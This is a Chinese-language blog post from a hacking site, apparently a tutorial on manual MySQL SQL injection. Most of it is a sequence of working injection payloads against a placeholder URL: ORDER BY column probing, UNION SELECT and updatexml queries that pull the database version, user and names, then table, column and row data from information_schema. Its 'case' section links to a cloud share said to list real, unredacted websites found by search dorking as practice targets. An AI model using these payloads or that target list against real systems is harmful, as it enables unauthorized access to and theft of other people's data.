MYSQL手工注入基础

  • 内容
  • 相关

1.判断是否存在注入
2.注释符
3.表字段数
4.判断数据库版本及服务信息
5.查询数据库
6.案例
7.参考

1.判断是否存在注入(常用)

'
\
and 
or

2.注释符

# 字符从行尾
-- (注意--后面有一个空格)
/* */ 结束序列不一定在同一行中,因此该语法允许注释跨越多行。

 

3.表字段数

通常使用“order by N”,通过不断变换N的值,至刚好返回正常的网页,可得到当前表的字段数。

 

www.xxxxx.com/test?id=12 order by 8-- 正确

www.xxxxx.com/test?id=12 and 1=2 union select 1,2,3,4,5,6,7,8-- 显示2个位置。

 

4.判断数据库版本及服务信息

www.xxxxx.com/test?id=12  and 1=2 union select 1,version(),3,4,5,6,7,8--   Mysql数据库的版本

www.xxxxx.com/test?id=12+union+select+1,concat(user(),0x20,database(),0x20,version()),3,4,5,6,7,8 --   数据库用户,数据库名,数据库版本

www.xxxxx.com/test?id=12 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)    数据库用户名

MYSQL数据库函数
User() 查看用户 
database() --查看数据库名称 
Version() --查看数据库版本 
@@datadir --数据库路径
@@version_compile_os--操作系统版本 
system_user() --系统用户名 
current_user()--当前用户名 
session_user()--连接数据库的用户名 

5.查询数据库

www.xxxxx.com/test?id=12 and 1=2 union select 1,group_concat(distinct table_schema),3,4,5,6,7,8 from information_schema.columns--      查询当前数据库名

www.xxxxx.com/test?id=12 and 1=2 union select 1,group_concat(distinct table_name),3,4,5,6,7,8 from+information_schema.tables where table_schema=database()--  查询当前

www.xxxxx.com/test?id=12 and (select * from (select * from test as a join test as b) as c);  在不知道字段的情况下查看当前数据库
数据表名

https://www.bejson.com/convert/ox2str/  16进制转换工具

www.xxxxx.com/test?id=12  and 1=2 union select 1,group_concat(distinct column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x 16进制--   查询字段

www.xxxxx.com/test?id=12 and 1=2 union select 1,group_concat(查询出来的字段),3,4,5,6,7,8 from+downloads -- 查询数据

6.案例

网站是通过谷歌语法找的,没有打码,禁止破坏。。。。

链接: https://pan.baidu.com/s/1boWWQvH 密码: 4phq

 

7.参考:

k1p4ss.sinaapp.com/?p=108

blog.sycsec.com/?p=1005

www.cnblogs.com/cnsanshao/p/3364600.html

www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/#QuickDetection
www.poluoluo.com/server/201706/547394.html

MYSQL官网文档: https://pan.baidu.com/s/1i5y6cvV 密码: 9wc9

作者:小雨

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:MYSQL手工注入基础 - https://www.0dayhack.com/post-723.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注